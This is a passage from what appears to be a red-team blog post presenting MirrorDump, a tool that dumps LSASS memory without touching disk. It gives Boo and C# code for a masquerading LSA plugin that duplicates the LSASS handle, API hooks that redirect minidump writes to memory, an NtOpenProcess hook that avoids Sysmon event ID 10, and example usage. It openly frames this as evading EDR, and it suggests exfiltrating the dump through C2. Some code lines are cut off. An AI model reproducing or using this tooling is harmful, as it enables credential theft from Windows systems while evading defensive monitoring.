

executed. The native DLL's handled the hooking component using the brilliant MinHook library and the correct architecture was chosen and loaded at runtime.

I set myself the challenge of porting this solution to a pure managed C# solution that did not involve any native code at all. As part of this challenge, I also wanted to find a more covert way to obtain the LSASS handle than using the OpenProcess API directly from the memory dumping tool. Using OpenProcess directly is a sure-fire way to raise red flags with various EDR solutions that we commonly see today when you target the Isass process.

# Say Boooo to OpenProcess

Recently I have also fallen in love with Boo for offensive tooling. Boo is a programming language that implements the Microsoft Dynamic Language Runtime (DLR) that will allow the developer yielding it's power to generate .NET assemblies both in memory and on disk on the fly. The language is not too dissimilar to python with some additional .NET based semantics.

The idea was to load an LSA SSP/AP plugin, masquerading itself as a genuine authentication provider to the host operating system. Once loaded within the LSA eco system, grab a handle to it's own process (Isass.exe) and duplicate into our dumping tool ready to create the minidump. There are examples of previous work that have used LSA authentication providers to capture credentials. One such example is the <a href="Intercepting Logon Credentials via Custom Security Support Provider and Authentication Packages">Intercepting Logon Credentials via Custom Security Support Provider and Authentication Packages</a> by ired.team. But in our case we are looking to duplicate the Isass handle instead using a Boo script that is compiled to a .NET assembly on the fly.

```
ſĊ
from System import IntPtr
import System.Reflection
import System.Runtime.InteropServices
import MirrorDump
[DllImport("kernel32.dll")]
def DuplicateHandle(sourceProcess as IntPtr, sourceHandle as IntPtr,
        desiredAccess as uint, inherit as bool, options as uint) as |
        pass
[DllImport("kernel32.dll")]
def OpenProcess(processAccess as uint, inherit as bool, processId as
        pass
[DllImport("kernel32.dll")]
def GetCurrentProcess() as IntPtr:
        pass
[DllImport("kernel32.dll")]
def CloseHandle(hObject as IntPtr) as bool:
        pass
[DllExport]
def SpLsaModeInitialize(LsaVersion as int, PackageVersion as IntPtr,
        Marshal.WriteInt32(PackageVersion, 1);
        Marshal.WriteInt32(pcTables, 0);
        Marshal.WriteIntPtr(ppTables, IntPtr.Zero)
        handle = OpenProcess(0x40, true, {0})
        targetHandle = IntPtr.Zero
        DuplicateHandle(GetCurrentProcess(),GetCurrentProcess(), hand
        CloseHandle(handle)
        return 0
```

As you can see from the Boo code above, the LSA plugin is very simple. It has one function called <code>SpLsaModeInitialize</code> and a few imports from kernel32 that facilitate the duplication of the LSASS handle. The <code>OpenProcess</code> API call that you can see is opening a handle to the dumping process that we will be duplicating the lsass handle into. You will also notice that the third parameter is in the form of a .NET format string

argument and not a PID. This is due to the fact that we are generating our .NET assembly on the fly and the PID argument is embedded at runtime like below;

```
string script = string.Format(GetResourceFileAsString("MiniDumpToMem! ☐
AssemblyBuilder assembly = (AssemblyBuilder)CompileBooAssembly(scrip*
```

One other thing to note is the <code>[DllExport]</code> attribute attached to the <code>SpLsaModeInitialize</code> function. The LSA subsystem expects an LSA plugin to expose this function to be eligible for loading. Believe it or not, .NET DLL's can also export functions and be called from native code too, exactly like the DllImport functionality but in reverse. Adam Chester done a great post on this back in 2018 called <a href="RunDLL32">RunDLL32</a> your .NET (AKA DLL exports from .NET).

But this functionality is not natively supported by the DLR compiler directly. As Adam mentioned in his blog post, there is the <u>DllExport</u> project by Denis Kuzmin that has support for this, but unfortunately because we are generating our LSA DLL on the fly, it was not possible to use this. I needed to find a way to do this with DLR assemblies.

Enter dnlib. dnlib is a library that facilitates reading and modifying .NET modules and assemblies. One of it's capabilities is marking methods within the assembly as exported. Using dnlib, we search the recently compiled LSA plugin assembly from our boo script for functions that are tagged with the DllExport attribute. Once found, the function is marked as exportable.

```
//Little trick here that uses dnlib to search for all functions with: lacksquare
//assembly that has the DllExport attribute. We then mark that func
//and remove the attribute so that we don't have a dependency on the
foreach (var type in module.GetTypes()) {
    foreach (var method in type.Methods) {
        var toRemove = new List<CustomAttribute>();
        foreach (var attrib in method.CustomAttributes) {
            if (attrib.TypeFullName == typeof(DllExportAttribute).Ful
                method.ExportInfo = new MethodExportInfo();
                var retType = method.MethodSig.RetType;
                method.MethodSig.RetType = new CModOptSig(module.Cor)
                toRemove.Add(attrib);
            }
        }
        toRemove.ForEach(remove => method.CustomAttributes.Remove(rei
    }
}
var moduleOptions = new ModuleWriterOptions(module);
moduleOptions.PEHeadersOptions.Machine = IntPtr.Size == 8 ? dnlib.PE
moduleOptions.Cor20HeaderOptions.Flags &= ~(dnlib.DotNet.MD.ComImage)
if (IntPtr.Size == 4) {
    moduleOptions.Cor20HeaderOptions.Flags |= dnlib.DotNet.MD.ComIma;
    moduleOptions.Cor20HeaderOptions.Flags &= ~(dnlib.DotNet.MD.ComI)
}
```

The final compiled .NET LSA assembly looks something similar to this in dnSpy

```
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[CompilerGlobalScope]
public sealed class WP4U5XjsEHModule
    [DllImport("kernel32.dll")]
    public static extern bool DuplicateHandle(IntPtr sourceProcess, IntPtr sourceHandle,
       IntPtr targetProcess, ref IntPtr targetHandle, uint desiredAccess, bool inherit,
      uint options);
    [DllImport("kernel32.dll")]
    public static extern IntPtr OpenProcess(uint processAccess, bool inherit, int
    [DllImport("kernel32.dll")]
    public static extern IntPt
    [DllImport("kernel32.dll")]
     public static extern bool CloseHandle(IntPtr hObject);
    public static int SpLsaModeInitialize(int LsaVersion, IntPtr PackageVersion, IntPtr
      ppTables, IntPtr pcTables)
         Marshal.WriteInt32(PackageVersion, 1);
         Marshal.WriteInt32(pcTables, 0);
Marshal.WriteIntPtr(ppTables, IntPtr.Zero);
         IntPtr intPtr = WP4U5XjsEHModule.OpenProcess(64U, true, 29884);
        IntPtr zero = IntPtr.Zero;
WP4U5XjsEHModule.DuplicateHandle(WP4U5XjsEHModule.GetCurrentProcess(),
    WP4U5XjsEHModule.GetCurrentProcess(), intPtr, ref zero, 2035711U, false, 1U);
WP4U5XjsEHModule.CloseHandle(intPtr);
     private WP4U5XjsEHModule()
```

## MinHook.NET

With the LSA plugin out the way, it was now time to tackle hooking the file writing API's involved when a minidump is written. I spent some time porting the MinHook library to .NET and subsequently releasing the library in tandem with the MirrorDump tool. I wont go into too much detail on the port as it's very similar to MinHook itself. MinHook.NET uses a slightly modified version of the <a href="SharpDisasm">SharpDisasm</a> project for dissasembling the instructions at the target function for hooking.

I have tried to keep the API as similar as possible to the native version of MinHook, but here is a quick example of hooking MessageBoxA API

```
Q
//PInvoke import of the MessageBoxW API from user32.dll
[DllImport("user32.dll", SetLastError = true, CharSet= CharSet.Unico
public static extern int MessageBoxW(int hWnd, String text, String ca
//We need to declare a delegate that matches the prototype of the how
[UnmanagedFunctionPointer(CharSet=CharSet.Unicode)]
delegate int MessageBoxWDelegate(IntPtr hWnd, string text, string cap
//A variable to store the original function so that we can call
//within our detoured MessageBoxW handler
MessageBoxWDelegate MessageBoxW_orig;
//Our actual detour handler function
int MessageBoxW_Detour(IntPtr hWnd, string text, string caption, uin
    return MessageBoxW_orig(hWnd, "HOOKED: " + text, caption, type);
}
void ChangeMessageBoxMessage(){
    hookEngine = new HookEngine();
    MessageBoxW_orig = hookEngine.CreateHook("user32.dll", "MessageBoxBox "user32.dll", "MessageBoxBox")
    hookEngine.EnableHooks();
    //Call the PInvoke import to test our hook is in place
    MessageBox(IntPtr.Zero, "Text", "Caption", 0);
    hookEngine.DisableHooks();
}
```

You can find the standalone version of MinHook.Net on GitHub!

## Misdirection

Under the watchful eye of a debugger, I had observed that during the MiniDumpWriteDump API call, only three Windows API's relating to file writing were called.

- GetFileSize
- SetFilePointer
- WriteFile

If we could hook these three API's and trick MiniDumpWriteDump that all went well on the file writing front, we could capture the write buffers and redirect them to memory only.

#### **GetFileSize**

```
static uint GetFileSize(IntPtr fileHandle, out uint fileSizeHigh) {
   DumpContext dc = GetDumpContextFromHandle(fileHandle);
   if (dc == null)
      return GetFileSize_orig(fileHandle, out fileSizeHigh);

fileSizeHigh = 0;
   return dc.Size;
}
```

Lets start with the easy one, GetFileSize . Each hooked function has a check at the top to determine if the fileHandle being worked on is the one of interest. If not, then a call to the original function is made. If it is our handle in question then we simply return our DumpContext structure and return the tracked virtual file size. We use a magic handle value (0x55555555) to spot the difference between a real file handle and our virtual minidump file handle.

### SetFilePointer

```
static uint SetFilePointer(IntPtr fileHandle, int distanceToMove, re. 
   DumpContext dc = GetDumpContextFromHandle(fileHandle);
   if (dc == null)
        return SetFilePointer_orig(fileHandle, distanceToMove, ref d:
   switch (moveMethod) {
        case MoveMethod.Begin:
            dc.CurrentOffset = (uint)distanceToMove;
            break:
        case MoveMethod.Current:
            dc.CurrentOffset = (uint)(dc.CurrentOffset + distanceToM
            break;
        case MoveMethod.End:
            dc.CurrentOffset = (uint)(dc.Size + distanceToMove);
        default:
            return 0xffffffff;
   }
   return dc.CurrentOffset;
}
```

The SetFilePointer hook is tasked with tracking the position of our in memory file pointer. Again, nothing too fancy other than calculating where the new position is, based on the current position and the move method and distance requested.

#### WriteFile

```
static bool WriteFile(IntPtr fileHandle, IntPtr buffer, uint numberO .
    DumpContext dc = GetDumpContextFromHandle(fileHandle);
    if (dc == null)
        return WriteFile_orig(fileHandle, buffer, numberOfBytesToWri<sup>-</sup>
    if (dc.Limit != 0 && dc.CurrentOffset + numberOfBytesToWrite > dc.
        SetLastError(ERROR DISK FULL);
        numberOfBytesWritten = 0;
        return false;
    } else if (dc.CurrentOffset + numberOfBytesToWrite > dc.Data.Len{
        dc.Resize(dc.CurrentOffset + numberOfBytesToWrite);
    }
    Marshal.Copy(buffer, dc.Data, (int)dc.CurrentOffset, (int)number(
    dc.CurrentOffset += numberOfBytesToWrite;
    numberOfBytesWritten = numberOfBytesToWrite;
    int growth = (int)dc.CurrentOffset - (int)dc.Size;
    if (growth > 0) {
        dc.Size += (uint)growth;
    }
    return true;
}
```

Next we have the WriteFile function hook. This function is tasked with expanding our in memory buffer when we detect that a file write has passed the end of our virtual file size and to also copy the content of the pending write to our in memory buffer instead of a real file. Because memory dumps can be large, I added the concept of a memory dump size limit. In this scenario if a memory dump goes beyond the limit, we simulate an ERROR\_DISK\_FULL error to prevent potential memory exhaustion on machines with limited resources.

```
int pid = Marshal.ReadInt32(ClientId);
if(pid != lsassPid)
    return NtOpenProcess_orig(ProcessHandle, desiredAccess, Objet

IntPtr currentProcess = new IntPtr(-1);
IntPtr newLsassHandle;

if(!DuplicateHandle(currentProcess, lsassHandle, currentProcess,
    Console.WriteLine("[!] Failed to fake NtOpenProcess on LSASS return Marshal.GetLastWin32Error();
}

Marshal.WriteIntPtr(ProcessHandle, newLsassHandle);
return 0;
}
```

Finally we have the NtOpenProcess hook. I have to give a specific shout out to @TheRealWover here. After some discussions relating to the MiniDumpWriteDump he pointed out that even though you use a stolen handle on LSASS, the internals of MiniDumpWriteDump will open an additional handle to the LSASS process. This of course will trigger event ID 10 in SysMon. After some digging around myself, I found the same behavior. Internally, MiniDumpWriteDump eventually triggers a call to RtlQueryProcessDebugInformation which is where the source of the additional handle comes from.

So in our hook function we simulate a call to NtOpenProcess by duplicating the stolen handle that we already have for Isass. This will mean real NtOpenProcess is called and no event ID 10 is generated from SysMon where MirrorDump is the source process and Isass is the target process.

# Cleanup

Once the memory dump had been taken, the original end goal was to unload the LSA plugin DLL and delete it. I was hoping that the DeleteSecurityPackage API call would sort all this out for me.

But every time I called <code>DeleteSecurityPackage</code> I was faced with error <code>0x80090302</code> (SEC\_E\_UNSUPPORTED\_FUNCTION). I spent quite some time implementing further mandatory functions that should be implemented as part of a real LSA plugin. Nothing worked, I still got the same error.

I then came across this <u>blog</u> post by CyberNigma. It turns out Microsoft have not implemented the <u>DeleteSecuritPackage</u> function even though it is documented on MSDN. So unfortunately a reboot is required to remove the LSA DLL. There is potential for injecting shellcode into Isass and unloading it now that we have a handle. But I'll leave that as an exercise for the reader;)

### Demo

## Usage

The current POC application will take the uncompressed in memory dump and save it to a zip file. But this could equally be exfilled without touching disk by uploading to a server or sending the data back through your C2 implant.

The tool can be run without any arguments which will use sane defaults for the output filename and the DLL name used for generating the LSA plugin. There is no default limit to the size of the in memory dump, so use with caution if you have not specified the limit (in bytes).

```
.\MirrorDump.exe --help
-f, --filename=VALUE
-d, --dllName=VALUE
-l, --limit=VALUE
-h, --help

Output path for generated zip file
Output LSA DLL name
The maximum amount of memory the miniduly allowed to consume
Display this help
```

## Example

Example below which will create and load an LSA plugin DLL called LegitLSAPlugin.dll, the in memory dump of LSASS will end up in a ZIP file called NotLSASS.zip and we will limit the memory used to 100MB

```
.\MirrorDump.exe -f "NotLSASS.zip" -d "LegitLSAPlugin.dll" -1 107374: [-]
[+] Generating new LSA DLL LegitLSAPlugin.dll targetting PID 572....
[+] LSA security package loaded, searching current process for duplicated LSASS process handle 0x3ec
[-] Dumping LSASS memory
```

